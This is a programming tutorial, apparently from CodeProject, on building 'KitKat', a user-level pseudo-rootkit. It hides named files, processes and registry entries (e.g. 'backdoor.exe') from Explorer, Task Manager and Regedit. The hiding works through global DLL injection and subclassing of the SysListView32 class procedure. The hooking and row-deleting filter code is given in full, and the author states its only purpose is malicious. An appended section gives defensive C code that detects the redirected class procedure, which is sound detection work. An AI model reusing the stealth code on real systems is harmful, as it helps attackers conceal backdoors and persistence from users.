KitKat - The Lazy/Poor Man's Rootkit
- Introduction
- Background
- Disclaimer
- Using the code
- Theory
- DLL injection
- Working
- Hooking The ListView Procedure
- Filter Function
- Summary
- DrawBacks
- FAQ
- Authors Notes
- History
- License
- About the Author
Original post: http://www.codeproject.com/KB/threads/Kitkat.aspx
- Download Kitkat - 3.89 KB
- Download DllTester - 2.51 KB
Introduction
This article is about using global hooks and window subclassing to create a pseudo-rootkit capable of hiding files from Explorer, Task Manager, Registry Editor, etc.
Background
You must know basic C++, Windows programming and global hooks (for DLL injection). You must, of course, know what a rootkit is.
Disclaimer
Though the program is well tested, I have to include this disclaimer. The following program attempts to modify your operating system, which may make your system unstable. By compiling or executing the program you agree that neither the author nor the site hosting this article shall be held responsible for any damages that occur due to this program. This program comes with NO WARRANTY. USE AT YOUR OWN RISK!! If this scares you, you probably shouldn't run this program. The author hereby disclaims all liability. This article may not be re-published elsewhere without the permission of the author.
Using the code
Compile the VC++ project to obtain a DLL. You could write your own loader, but I have enclosed a small DLL tester written in VB just in case. Once loaded, the DLL will establish a CallWnd hook.
Theory
OK, before I start a flame war or get outed by the gurus out here, I'd like to state that KitKat is not a "system rootkit". It's more of a "user rootkit", not to be confused with "user-mode rootkits (ring 3)"...
There are two kinds of rootkits:
- Kernel-mode rootkits (run in ring 0 and filter requests at the highest level)
- User-mode rootkits (run in user mode and use API redirection and IAT hooking to get the job done)
The most powerful rootkits are no doubt the kernel rootkits. User-mode rootkits are less desirable; it is well known that not all API calls can be hooked using IAT patching. (Link to Article)
So which one of these does KitKat belong to? Actually, it's neither of them...
See, most rootkits have the following model:
OS ---> RootKit Filter ---> User
Every file that is being stealthed is hidden from the system itself, which means that even if one tries to locate the file programmatically, one can't, since the filter intercepts such a request.
So it effectively stealths the files/processes from BOTH the SYSTEM and THE USER. If an antivirus requested a file that was being stealthed, the AV would get an "INVALID_FILE_HANDLE".
KitKat's model, however, is the following:
Windows GUI ----> Kitkat RootKit Filter ----> User
As you can see, the OS doesn't figure in the diagram, because KitKat only modifies/affects the GUI of the system. KitKat does NOT stealth your files from the system itself. It only hides your files from the user's sight; the files can be read and written programmatically by any program.
For example, say KitKat is hiding a file (c:/test.txt). You won't be able to see the file using Explorer,
but if you tried to execute "notepad c:/test.txt" this would work fine, since the system can "SEE" the file.
The system remains unaffected, only the GUI is affected. So this method can be used to
- Hide process listings (from Task Manager, etc.)
- Hide files in Explorer (folders, files, common dialog boxes)
- Hide entries in Registry Editor (regedit)
I hope you're getting this...
DLL injection
The DLL injection method is based on Ivo Ivanov's code. A million thanks to him. Search this site for it.
Working
Grab your trusty Spy++ and try to find out the class name of the main window (where folders and files are displayed) used by
- Explorer.exe
- Regedit.exe
- Taskmgr.exe
- Common dialogs (Open File, Save File)
- Etc. (pretty much everything on your PC)
You'll notice all the main windows (where folders and files are displayed) are of class name "SysListView32", which is popularly called a "ListView". Note that almost every control in Windows is a window: they are all created using "CreateWindow". Windows differentiates between a button and a list by means of a class name, and every window has a window procedure.
For each class there are specific procedures. For a button, WM_COMMAND may simulate a depressed button; the same message for a list simply highlights the selection. So you see, every control has its own built-in default procedure, and we are going to redirect this default procedure to our filter.
Kitkat.dll is going to be injected into every process that has a message queue (using a CallWnd hook). Once injected, using global subclassing we are going to "redirect" the default window procedure of the ListView class to our filter function.
To perform the redirection we only need one API: "SetClassLong".
Hooking The ListView Procedure
#include <windows.h>
#include <commctrl.h>

// Create a temporary SysListView32 window, since SetClassLong needs a window of that class
HWND hWnd = CreateWindow("SysListView32", "", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);
OldWndProc = SetClassLong(hWnd, GCL_WNDPROC, (LONG)NewWndProc); // returns the previous class procedure
DestroyWindow(hWnd); // destroy it, we don't need it anymore; the class keeps the new procedure
Once this is done, every ListView created AFTER the hook was established will be affected.
Note: ListViews created before are unaffected. This is just one of the many drawbacks of the KitKat method. Although it could be done with SetWindowLong() on each existing ListView, we'd then have to remember the old procedure for each one of them. Hey, this is just a demo.
Notice that we got OldWndProc. You need to store this; we'll need it to call the real procedure.
Filter Function
#include <windows.h>
#include <commctrl.h>
#include <string.h>

#define MAX 260                                      // size of the cell text buffer
static const char *procList[] = { "backdoor.exe" };  // hardcoded names to hide (lower case)
#define UBOUND_PROCLIST (sizeof(procList) / sizeof(procList[0]))

char temp[MAX];
LONG OldWndProc;

LRESULT CALLBACK NewWndProc(HWND Hwnd, UINT Message, WPARAM wParam, LPARAM lParam)
{
    switch (Message) {
    // Why hook WM_PAINT? Because it was the only common message I found that
    // was sent to all of "Explorer.exe", "Regedit.exe" and "taskmgr.exe"
    case WM_PAINT: {                                 // braces: declarations may not follow a case label directly
        // Find the number of columns; we'll search every column
        HWND hdr = (HWND)SendMessage(Hwnd, LVM_GETHEADER, 0, 0);
        int Col = (int)SendMessage(hdr, HDM_GETITEMCOUNT, 0, 0);
        Col++;
        int i, j, k, itemCount = ListView_GetItemCount(Hwnd);
        for (i = 0; i < Col; i++) {
            for (j = 0; j < itemCount; j++) {
                ListView_GetItemText(Hwnd, j, i, temp, MAX);
                _strlwr(temp);                       // lower-case in place (no overlapping strcpy)
                for (k = 0; k < (int)UBOUND_PROCLIST; k++) {
                    // substring search
                    if (strstr(temp, procList[k])) {
                        ListView_DeleteItem(Hwnd, j);
                        itemCount--;
                        j--;
                        break;                       // this row is gone; move on to the next one
                    }
                }
            }
        }
        break;
    }
    }
    return CallWindowProc((WNDPROC)OldWndProc, Hwnd, Message, wParam, lParam);
}
Summary
Now, a ListView can have multiple columns. Let's say I'm this evil malicious hacker dude those guys at Microsoft always seem to be talking about. Anyway, I have my "backdoor.exe", which has created an autorun entry in the registry, and I want my entry to be hidden:
- Inject the DLL into Regedit.exe
- Subclass SysListView32
- Intercept the WM_PAINT message
- Search through ALL columns and ALL rows to find "backdoor.exe"
- If found, delete that entire row
- Call the default procedure
DrawBacks
- Does not affect console programs (because they don't have message queues)
- Any program can "detect" the files if it actively looks for them. Assuming the user doesn't know he's been compromised, he'll never look for them.
- Controls created prior to hooking are unaffected.
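As an added example (not part of the original article), here is the defender's side of the "any program can detect it" point above and of the SetClassLong redirection under "Hooking The ListView Procedure": a process creates a throwaway SysListView32, reads the class window procedure and asks which module owns that address; stock comctl32.dll is expected, anything else means the class procedure has been redirected inside that process. It assumes Windows XP or later (for GetModuleHandleEx); the file name lvcheck.c and the functions wndproc_looks_hooked and check_listview_class are mine, and on a non-Windows build only the portable classifier is compiled.

```c
/* Added example (not from the KitKat article): detect the class-level subclassing
 * KitKat installs via SetClassLong(GCL_WNDPROC) on SysListView32. XP or later. */
#define _WIN32_WINNT 0x0501
#include <stdio.h>
#include <string.h>
#include <ctype.h>
/* Portable part: the stock owner of the class procedure is comctl32.dll; 1 = anything else. */
int wndproc_looks_hooked(const char *owner_module_path)
{
    const char *base = owner_module_path, *p;
    char low[64]; size_t n = 0;
    for (p = owner_module_path; *p; ++p) if (*p == '\\' || *p == '/') base = p + 1;
    for (; base[n] && n < sizeof low - 1; ++n) low[n] = (char)tolower((unsigned char)base[n]);
    low[n] = '\0';
    return strcmp(low, "comctl32.dll") != 0;      /* case-insensitive file-name compare */
}
#ifdef _WIN32
#include <windows.h>
#include <commctrl.h>
/* Windows part: a throwaway ListView yields the class (and lets a CallWndProc hook
 * DLL load into this process first); then ask which module owns the class WNDPROC. */
int check_listview_class(char *owner, size_t owner_len)
{
    INITCOMMONCONTROLSEX icc = { sizeof icc, ICC_LISTVIEW_CLASSES };
    HWND h; void *proc; HMODULE mod = NULL;
    InitCommonControlsEx(&icc);
    h = CreateWindowExA(0, "SysListView32", "", 0, 0, 0, 0, 0, NULL, NULL,
                        GetModuleHandleA(NULL), NULL);
    if (!h) return -1;
    proc = (void *)GetClassLongPtrA(h, GCLP_WNDPROC);
    DestroyWindow(h);
    if (!GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
            GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, (LPCSTR)proc, &mod)) {
        snprintf(owner, owner_len, "<address outside any module>");
        return 1;                                 /* nothing owns it: treat as hooked */
    }
    GetModuleFileNameA(mod, owner, (DWORD)owner_len);
    return wndproc_looks_hooked(owner);
}
#endif
int main(void)
{
    char owner[512] = "(non-Windows build: classifier only)"; int r = 0;
#ifdef _WIN32
    r = check_listview_class(owner, sizeof owner);   /* build: cl lvcheck.c user32.lib comctl32.lib */
#endif
    printf("SysListView32 WNDPROC owner: %s -> %s\n", owner, r ? "REDIRECTED" : "stock");
    return r;
}
```

A REDIRECTED result is a lead, not proof of KitKat: accessibility tools and some shell extensions also subclass common controls globally, so inspect the owning module that is printed.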
FAQ
Q : Why WM_PAINT?
A : I tried to monitor all messages that were sent to SysListView32; the only common message that was sent in Explorer.exe, Taskmgr.exe and Regedit.exe was WM_PAINT. There are others, but they are not consistent across all applications.
Q : In Explorer, there's an empty space where the icon (for the stealthed file) was supposed to be. What's with that?
A : I'm guessing the positions are assigned before WM_PAINT is sent, so when we filter the result the space is already allocated for the icon. I guess if we intercepted another message this could be fixed, but I haven't tried any.
Q : What is its purpose?
A : Unfortunately, the only purpose I can tell you involves malicious applications. But I hope something good can come out of it.
Q : Hey, I can see the stealthed files using cmd. Can you implement a method that works for them?
A : It can be implemented; we'd have to redirect StdIn, StdOut and StdError using pipes, but that's a story for another time. Who knows, if I get the time I will...
Q : It doesn't work on my system?
A : As of now, I have tested it only on my own system, which is Win2k SP4. If it doesn't work on your system please report it, so that the article can be corrected.
Q : It's a DLL, how do I execute it?
A : You could write your own loader, but I have enclosed a small DLL tester written in VB just in case. Once loaded, the DLL will establish a CallWnd hook. You can customize it yourself...
Authors Notes
The processes to hide are hardcoded. To make it flexible you can use "ini" files to read the filenames.
You can prevent the DLL from injecting itself into certain processes by matching g_exePath against the filename (say "explorer.exe").
More notes in the source code.
History
17 Feb 08 : Original Draft
License
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL).
About the Author